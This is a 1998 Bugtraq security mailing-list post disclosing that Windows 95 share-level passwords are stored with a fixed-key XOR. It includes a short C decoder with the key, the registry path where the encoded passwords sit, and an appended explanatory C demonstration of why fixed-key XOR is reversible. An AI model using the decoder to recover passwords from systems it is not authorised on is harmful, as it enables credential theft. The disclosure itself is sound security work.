Date: Mon, 9 Feb 1998 01:32:25 -0500
From: a42n8k9@redrose.net
To: BUGTRAQ@NETSPACE.ORG
Subject: How one small flaw could lead to major problems

Greetings,

First off I would like to apologize to aleph1. It would appear that an original draft of this got sent direct, before I had completed my thoughts on it. I will try and be more careful when wielding a loaded mouse. (hope no one got hurt)

And now for the stuff ...

While perusing the rootshell.com site, I came across the file "sharepw.c" under January's archive group. The program demonstrates the ability to decode the Windows95 "share-level" password. Curious, I downloaded the file and began to examine it.

The file itself weighs in at 883 lines in length, though largely commented. The code contains what are termed "pairs", "quads", "blocks", and "tables" that are used to decipher the password 'inline'.

Upon further examination, (by mere chance actually), I noticed an alarming similarity developing between the coded and decoded passwords. Someone please correct me if I am wrong, but it would seem that the "share-level" password is nothing more than a simple XOR cipher. With this being the case, the 883 line program gets reduced to the few lines you see below.

    #include <sys/types.h>   /* u_char, u_long */

    /* Fixed 8-byte XOR key; one byte per password position. */
    u_char key[] = { 0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a, };

    /* Decodes PW in place; PW must have room for Size + 1 bytes. */
    void CrackSharePW(u_char *PW, u_long Size)
    {
        if (Size > sizeof key)      /* the key has only 8 bytes */
            Size = sizeof key;
        PW[Size] = '\0';
        while(Size--)
            PW[Size] ^= key[Size];
    }

The passwords can be found in the registry at:

    SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
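As an added illustration (not part of the original post or of sharepw.c), the following C program shows why a fixed-key XOR is reversible obfuscation rather than encryption: the same routine both encodes and decodes, and any single known password/stored-value pair gives the key bytes straight back, which is exactly why an 883-line decoder collapses to one loop. The key bytes are the ones quoted above; the sample password is constructed for the demonstration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The fixed 8-byte key quoted in the post above. */
static const unsigned char share_key[8] = {
    0x35, 0x9a, 0x4d, 0xa6, 0x53, 0xa9, 0xd4, 0x6a
};

/* XOR each byte of in[] with the corresponding key byte into out[].
 * XOR is its own inverse, so this one routine is both the "encoder"
 * and the "decoder". Returns the number of bytes processed, or 0 when
 * len exceeds the key length (the scheme has no key byte beyond 8). */
size_t xor_with_key(const unsigned char *in, unsigned char *out, size_t len)
{
    if (len > sizeof share_key)
        return 0;
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ share_key[i];
    return len;
}

/* Round-trip check: encode then decode must give back the original. */
int xor_roundtrip_ok(const char *pw)
{
    unsigned char enc[8], dec[8];
    size_t n = strlen(pw);
    if (xor_with_key((const unsigned char *)pw, enc, n) != n)
        return 0;
    if (xor_with_key(enc, dec, n) != n)
        return 0;
    return memcmp(pw, dec, n) == 0;
}

/* The property that makes this obfuscation, not encryption: one known
 * (plaintext, stored) pair yields every key byte it covers, because
 * plain ^ stored == key. No secret survives a single known password. */
int known_plaintext_reveals_key(const char *pw)
{
    unsigned char stored[8], derived[8];
    size_t n = strlen(pw);
    if (xor_with_key((const unsigned char *)pw, stored, n) != n)
        return 0;
    for (size_t i = 0; i < n; i++)
        derived[i] = (unsigned char)pw[i] ^ stored[i];
    return memcmp(derived, share_key, n) == 0;
}

int main(void)
{
    const char *sample = "hunter42";   /* constructed sample password, not from the post */
    printf("round trip ok: %d\n", xor_roundtrip_ok(sample));
    printf("known plaintext recovers key: %d\n", known_plaintext_reveals_key(sample));
    printf("9-byte input rejected: %d\n",
           xor_with_key((const unsigned char *)"123456789", NULL, 9) == 0);
    return 0;
}
```

The length guard matters for the same reason the post's key array does: the scheme defines exactly eight key bytes, so any decoder that indexes past them is reading whatever happens to follow the array in memory.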